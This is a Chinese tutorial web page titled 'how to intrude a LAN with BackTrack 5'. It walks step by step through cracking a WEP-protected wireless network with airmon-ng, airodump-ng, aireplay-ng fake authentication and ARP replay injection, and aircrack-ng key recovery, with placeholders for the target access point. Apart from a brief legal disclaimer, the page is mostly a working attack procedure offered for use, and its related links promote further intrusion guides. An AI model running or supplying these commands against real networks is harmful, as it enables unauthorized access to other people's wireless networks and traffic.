局域网知识 位置:首页>学习电脑>网络知识>局域网知识>《backtrack5怎么入侵局…》正文

backtrack5怎么入侵局域网

学习啦【局域网知识】 编辑:本达 发布时间:2016-09-12

  Backtrack一直都被当作WEP密码破解的首选系统, BackTrack 5和之前的BackTrack 3和BackTrack 4一样集成了破解无线密码的工具并且支持更多型号的网卡. 3分钟破解一个用WEP加密方式的无线网络用BackTrack 5是完全可能的.下面是学习啦小编给大家整理的一些有关backtrack5入侵局域网教程,希望对大家有帮助!

  backtrack5入侵局域网教程

  非法破解他人的无线网络等同犯罪, 请以自己的无线网络作为实验环境.

  首先, 需要准备:

  1.BackTrack 5 光盘版或者虚拟机镜像, 也可以是Backtrack5 U盘版

  2.一个兼容Backtrack的无线网卡

  3.使用WEP加密的无线网络加入点(指的就是你要破解的无线网络)

  点击进入Backtrack5系统下载

  需要的全部指令:

  (请根据实际情况替换粗体部分)

  1) ifconfig -a

  (可以查看到自己机子无线网卡的MAC地址和无线网卡的设备名称), 保留这个窗口方便下几步查看需要的信息, 打开新命令窗口进入一步)

  2) airmon-ng start wlan0 2

  (wlan0为无线网卡, 2为需要监听的频道, 根据自己情况输入, 此步骤为打开无线网卡的监听模式)

  3) airodump-ng –ivs -w name -c 2 wlan0

  (获取频道2的所有无线AP的信息, wlan0是无线网卡, 2为频道, 这一步的频道需要跟上一步的一致, 命令输入后会显示周围所有频道为*的无线AP,

  显示的列表:

  BSSID : 无线AP的Mac 地址

  PWR: AP信号的大小

  RXQ: 干扰值

  Beacons:发送和接受的数据包, 有数据传输的时候就会跳动

  #Data: 数据, 破解需要的最关键的就是这个

  CH:频道

  MB:网络连接速度

  ESSID: AP的名称

  保留这一窗口, 打开新的命令窗口进入下一步)

  4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX wlan0

  (发送欺骗, ap_essid为AP的名称, 例如Linksys或者TP-Link, ap_mac为AP的MAC地址, 第三步的BSSID就是AP的MAC地址, XXXXXXXXX为自己无线网卡的MAC地址, 第一步可以看到. 这一步成功后会显示Successful, 如不成功需要在信号强的地方重试, 成功后才可以进入下一步)

  5) aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 wlan0

  (ap_mac为无线AP的mac地址, 具体看步骤3, XXXXXXXX为无线网卡的mac地址, wlan0为网卡, 这一步执行以后, 开始正确的收发数据包, #Data开始上涨)

  6) aircrack-ng -n 64 -b ap_mac name-*.ivs

  (开始破解, ap_mac为ap的mac地址, 64指的是使用了64位加密, 多次破解失败的话可以试128)

  多数情况下当#data开始迅速跳动的时候就可以开始破解了, 不需要等到多少包, 如果#data这个数据增长缓慢的话, 换个位置到无线信号强的地方再试, 命令输入正确的话最快3分钟搞定一个64位加密的WEP AP是没问题的! e网软摘测试时用的USB网卡, 如果使用内置无线网卡性能上会提升很多.

 

看了“backtrack5怎么入侵局域网”的人还看了

1.局域网入侵如何做到的

2.怎样入侵局域网电脑

3.局域网内部入侵怎么防止

4.怎样用局域网强制控制别人电脑

5.教你如何抢掉局域网内所有IP

6.局域网怎么进入别人电脑(2)

7.局域网内如何保证局域网的安全

8.怎么Dos入侵

9.浅谈局域网安全十大威胁

10.怎么禁止局域网用户访问电脑的几个办法

本文已影响
网友评论

Copyright © 2006 - 2016 XUEXILA.COM All Rights Reserved

学习啦 版权所有